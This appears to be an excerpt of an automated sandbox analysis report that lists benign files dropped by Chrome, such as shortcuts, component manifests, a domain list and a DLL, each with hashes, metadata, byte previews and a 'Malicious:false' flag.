                                                                                                          SHA-512:574C9B2C47A2325DEB9138EC05FCCA6E809FFABAA83FA0EB67E0781FCAE1A216CDE1031E4A465D982CBF296B5FA66FFE3D8A9142C6824CEF26D99643CC994139
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VGY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VGY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VGY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2693
                                                                                                          Entropy (8bit):4.017356158786395
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BBFB9D403BAC8D71834D121C89262C6C
                                                                                                          SHA1:A2A523A4CA345E5956DDA666766F2A321FDFC240
                                                                                                          SHA-256:4D8F7799A76EAC0AB134EDD0DE4037CEC6188F1E01C94A3229B535B0D64FD626
                                                                                                          SHA-512:0EB43B5FDF5F7218F9F1E752B8B6A9ED47D2B7545400C19645AD8813C8A186374D0F8B0F4FBE88673D3A774E9176D336E7D68E68EC75633E4EB3E04E752C9C79
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VGY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VGY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 16:08:55 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2681
                                                                                                          Entropy (8bit):4.0068166526532005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:5064A0A8E76A67B0050878F1B90A3FC9
                                                                                                          SHA1:087D9E734E25BCEC02099AA8CB29D365B1DDAEAC
                                                                                                          SHA-256:36565E66096E73F9F01C601142723CDB78116A7BA3ED7F587B9E7F0AC95DD596
                                                                                                          SHA-512:86EFE43E206D92EDF4F728D8E7010F407BF8FAB2E51591ABE6C81AFA6FBD539D495023B63AEF8444C460AD16B137E030E80E2E715D16DD8165D4445633F098C4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,.....~..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VGY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VGY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VGY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 16:08:55 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2681
                                                                                                          Entropy (8bit):3.9959293992114775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:36FC32F66034F76FE4234547AD1C27CA
                                                                                                          SHA1:A44A100CFF8DA8945804E187451F9D938DECE1D5
                                                                                                          SHA-256:B059696E629B865717946F9C987657B7F93B1C265F0AA6C56305D0C8E8F89593
                                                                                                          SHA-512:2B3C426AA9CB69E5DD357A24BCF7D241D3870BEC072ABD6F9AB138A81AE1B7EE767F48D737DB9E51CB47E9B7491EE1ED7AB48693CC6BFE0371E27F334E83DF63
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VGY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VGY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VGY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 16:08:55 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2683
                                                                                                          Entropy (8bit):4.005800855111593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:52B5F9993CCFE27B4AE68D4DAB61EE29
                                                                                                          SHA1:6011FA10C85CF74931AD040D67EEDD7BAA4B6516
                                                                                                          SHA-256:83E49EA2F0AE4F137089E625ADCC8B1B680C6CC7A9AA3456959436A446955EAE
                                                                                                          SHA-512:F2CEC53A11421E97B068CFE9C986D216697B9E8DDFD107171F76D1D8F49C2115B7418E4AEB4998E4D38D67726253A91A9E2FB8ABD72D9F39ED7029B75016904B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,..../...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VGY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VGY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VGY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1558
                                                                                                          Entropy (8bit):5.11458514637545
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                          SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                          SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                          SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1864
                                                                                                          Entropy (8bit):6.021127689065198
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:68E6B5733E04AB7BF19699A84D8ABBC2
                                                                                                          SHA1:1C11F06CA1AD3ED8116D356AB9164FD1D52B5CF0
                                                                                                          SHA-256:F095F969D6711F53F97747371C83D5D634EAEF21C54CB1A6A1CC5B816D633709
                                                                                                          SHA-512:9DC5D824A55C969820D5D1FBB0CA7773361F044AE0C255E7C48D994E16CE169FCEAC3DE180A3A544EBEF32337EA535683115584D592370E5FE7D85C68B86C891
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIyNXB3SWdtQWU2QTVoeDVVTG9OV0laODBLbzJjbktOTHpacUdjbjlLT2c4In0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiOWVza0FuRlBsM3VCQzkwUmFWakxNaVI3NXZIQi0wQUVmMmg0RzU3ZXNpcyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC44LjEwLjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"dU2MmRUQSugaJAJvEN4uaQHx-KXdOkjj0yK8_aH4Afr3kN7DPOZRt6yLTS3UchBE5M-dgPPPBuKADj4KEK4B22SO6WQquL5J27AUPqQBGgr44-iFGVJdOLLlfirFlJmcYv6DUFRYiPsQFGMr1JFqInj19jgkOxzR6qqcNuTCB0wGEMeTU80r-igCjeQG6TIzPro7yKd_-UxsxO6OGAySmlIJIoU54X0p0ATNoZyAfkhb8kb0oN8unOU
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66
                                                                                                          Entropy (8bit):3.9159446964030753
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:CFB54589424206D0AE6437B5673F498D
                                                                                                          SHA1:D1EF6314F0F68EFDD0BA8F6CA9E59BFF863B1609
                                                                                                          SHA-256:285AC183C35350B4B77332172413902F83726CA8F53D63859B5DA082FD425A1C
                                                                                                          SHA-512:70FDCA4A1E6B7A5FFED3414E2DB74FECA7E0FD17482B8CB30393DFEE20AB9AD2B0B00FF0C590DD0E8D744D0EAD876CE8844519AF66618ED14666BCA56DF2DA21
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1.dbf288588465463a914bdfc5e86d465fb3592b2f1261dc0e40fcc5c1adc8e7e4
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):85
                                                                                                          Entropy (8bit):4.4533115571544695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C3419069A1C30140B77045ABA38F12CF
                                                                                                          SHA1:11920F0C1E55CADC7D2893D1EEBB268B3459762A
                                                                                                          SHA-256:DB9A702209807BA039871E542E8356219F342A8D9C9CA34BCD9A86727F4A3A0F
                                                                                                          SHA-512:C5E95A4E9F5919CB14F4127539C4353A55C5F68062BF6F95E1843B6690CEBED3C93170BADB2412B7FB9F109A620385B0AE74783227D6813F26FF8C29074758A1
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.8.10.0".}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9748
                                                                                                          Entropy (8bit):4.629326694042306
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:EEA4913A6625BEB838B3E4E79999B627
                                                                                                          SHA1:1B4966850F1B117041407413B70BFA925FD83703
                                                                                                          SHA-256:20EF4DE871ECE3C5F14867C4AE8465999C7A2CC1633525E752320E61F78A373C
                                                                                                          SHA-512:31B1429A5FACD6787F6BB45216A4AB1C724C79438C18EBFA8C19CED83149C17783FD492A03197110A75AAF38486A9F58828CA30B58D41E0FE89DFE8BDFC8A004
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1425
                                                                                                          Entropy (8bit):5.984015066019505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:DB6B5E9AD82567AC91E385C844EE48E8
                                                                                                          SHA1:A036AB1A8414849A86251A2FF9BF6710A9C9F4E7
                                                                                                          SHA-256:52C7DEEAF3D58CD2DFCD83742FB8A98EA190A3D00D472A7CD7EEA5906DADC42C
                                                                                                          SHA-512:513302E49F532A452867CA04B090AB6E86D5DF1B05F0C5C66E2E79B04841244F020CDE23CC5112400E8DFC01F77301079749BD435F71791E98289F94E0C29BEB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJkb3dubG9hZF9maWxlX3R5cGVzLnBiIiwicm9vdF9oYXNoIjoiQkJEaURlc3R5Zkk0NGlud1Job1pwcktTaklVRFFEYWE0N0VudExRY0JONCJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJXd0ZSSW5iRVhzeEQxTC1wcVJLOXIzcjhKaFVJZ2ZLZ0VabHl2XzI5aXJBIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoia2hhb2llYm5ka29qbG1wcGVlbWpoYnBiYW5kaWxqcGUiLCJpdGVtX3ZlcnNpb24iOiI2NyIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"kKjnK_PItzAiww4ew3TipZEHlREOkbr8UtbU-gA0Nty9dJxeCT89OutDvsrBvbjWbaELYjJeug3zH8EkBkgm-Ys03h0deA0OzuU19DjG67xldatYWg95ZaexcYoSRnyWpfBTZgvhO-9JLZxf36rYJVRQaQxUh6j9zRJAXBdfMtx2O3WZu4cZ2Bvza43OTYPpsEcxYmosdlns5P9vjb0JdlbFjHunCf44SjbNrjCpLZ6v5pTGp7wxROmCBO42Npsbvs4-LQpclOuAnfpe2KMpoP6gu_uMx7NPuSeBlecmdjrZmdrBs9TBEHCEC9vhB_gQk_9l3bG9saumEiiuzF25XA"},
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7983
                                                                                                          Entropy (8bit):5.140722973269124
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D28B6246CBA1D78930D98B7B943D4FC0
                                                                                                          SHA1:4936EBC7DBE0C2875046CAC3A4DCAA35A7434740
                                                                                                          SHA-256:239557F40C6F3A18673D220534B1A34289021142DC9BA0D438A3A678333A0EC6
                                                                                                          SHA-512:B8DBEBE85E6D720C36DBDAE9395FB633FB7028FECC5292498AC89276AE87BD6DE36288FBF858F3476E18033A430F503ACF6280596449DD0478B6AB7139F3CEA6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.C...#<....jpg... .*.........jpeg... .*.........mp3... .*.........mp4... .*.........png... .*.........csv... .*.........ica... .*.........gif... .*.........txt... .*.........package... .*.........tif... .*.........webp... .*.........mkv... .*.........wav... .*.........mov... .*.........avif... .*.........swf.D .*.........spl.E .*.........crx.. .*.........001..... .*.........7z.4.. .*.....0.....ace..... .*.........arc..... .*.........arj.:.. .*.........b64..... .*.........balz..... .*.........bhx..... .*.........bin..... .*.....0.....bz..... .*.........bz2.8.. .*.........bzip2..... .*.........cab.... .*.........cpio.@.. .*.........fat..... .*.........gz.6.. .*.........gzip..... .*.........hfs..... .*.........hqx..... .*.........iso..... .*.....0.....lha.<.. .*.........lpaq1..... .*.........lpaq5..... .*.........lpaq8..... .*.........lzh.;.. .*.........lzma.?.. .*.........mim..... .*.........ntfs..... .*.........paq8f..... .*.........paq8jd..... .*.........paq8l..... .*.........paq8o....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66
                                                                                                          Entropy (8bit):3.979439068908279
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0A07A8A7914A071E6811D81670554730
                                                                                                          SHA1:81F0F6EC7A80017DEBC7DA02EE490F054D3E5D3F
                                                                                                          SHA-256:B60DE962335450BF4502F51F99568F5F7BF4F640F964E0B5ACCBE33C7099A919
                                                                                                          SHA-512:D6214E6D00C98B71677D8922917ACE7C16613876DBAA4F7A20A776843252F5752E85038CD9ED4B7F8DB8312FE6A04B82C8C4BD7EC7FB9A60DB4119941DC3B499
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1.44c97a8527ef50cab95a16c5e78cd321cbdf315726823afe7e0482af9eb18319
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):76
                                                                                                          Entropy (8bit):4.347669086800013
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C08A4E8FE2334119D49CA6967C23850F
                                                                                                          SHA1:13C566B819D8E087246C80919E938EF2828B5DC4
                                                                                                          SHA-256:5B01512276C45ECC43D4BFA9A912BDAF7AFC26150881F2A0119972BFFDBD8AB0
                                                                                                          SHA-512:506F9F4FA4BAAA4096CE10007EB09CFA95C9188082053B9FF7F2DEC65164FF57506B6A8FEA28D58783700F257C982AEF037AFC33F62DA8DA281E67636430DC23
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{. "manifest_version": 2,. "name": "fileTypePolicies",. "version": "67".}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2877728
                                                                                                          Entropy (8bit):6.868480682648069
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:477C17B6448695110B4D227664AA3C48
                                                                                                          SHA1:949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
                                                                                                          SHA-256:CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
                                                                                                          SHA-512:1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....fd.........." ......(..........A&.......................................,.......,...`A.........................................V*......V*......`,......`+..p....+. )...p,......D*.8....................C*.(.....(.8...........p\*..............................text.....(.......(................. ..`.rdata..h.....(.......(.............@..@.data....l....*..&....*.............@....pdata...p...`+..r....*.............@..@.00cfg..(.....+......p+.............@..@.gxfg....$....+..&...r+.............@..@.retplnel.... ,.......+..................tls.........0,.......+.............@....voltbl.D....@,.......+................._RDATA.......P,.......+.............@..@.rsrc........`,.......+.............@..@.reloc.......p,.......+.............@..B........................................................................................................................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1778
                                                                                                          Entropy (8bit):6.02086725086136
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:3E839BA4DA1FFCE29A543C5756A19BDF
                                                                                                          SHA1:D8D84AC06C3BA27CCEF221C6F188042B741D2B91
                                                                                                          SHA-256:43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
                                                                                                          SHA-512:19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJHb29nbGUuV2lkZXZpbmUuQ0RNLmRsbCIsInJvb3RfaGFzaCI6Im9ZZjVLQ2Z1ai1MYmdLYkQyWFdBS1E5Nkp1bTR1Q2dCZTRVeEpGSExSNWMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiYk01YTJOU1d2RkY1LW9Tdml2eFdqdXVwZ05pblVGakdPQXRrLTBJcGpDZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Im5laWZhb2luZGdnZmNqaWNmZmtncG1ubHBwZWZmYWJkIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjI3MzguMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"KTPeHzS0ybFaz3_br3ASYWHjb6Ctul92067u2JMwtNYYm-4KxLiSkJZNBIzhm6hNSEW2p5kUEvHD0TjhhFGCZnWm9titj2bqJayCOAGxZb5BO74JJCRfy5Kwr1KSS4nvocsZepnHBmCiG2OV3by-Lyf1h1uU3X3bDfD92O0vJzrA8rwL2LrwIk-BolLo5nlM0I_MZwg8DhZ8SFBu9GGRVB2XrailDrv4SgupFE9gqA1HY6kjRjoyoAHbRRxZdBNNt9IKNdxNyaF9NcNRY8dAedNQ9Tw3YNp5jB7R9lcjO4knn58RdH2h_GiJ4l96StcXA4e7cqbJ77P-c
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66
                                                                                                          Entropy (8bit):3.974403644129192
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D30A5BBC00F7334EEDE0795D147B2E80
                                                                                                          SHA1:78F3A6995856854CAD0C524884F74E182F9C3C57
                                                                                                          SHA-256:A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
                                                                                                          SHA-512:DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):145
                                                                                                          Entropy (8bit):4.595307058143632
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BBC03E9C7C5944E62EFC9C660B7BD2B6
                                                                                                          SHA1:83F161E3F49B64553709994B048D9F597CDE3DC6
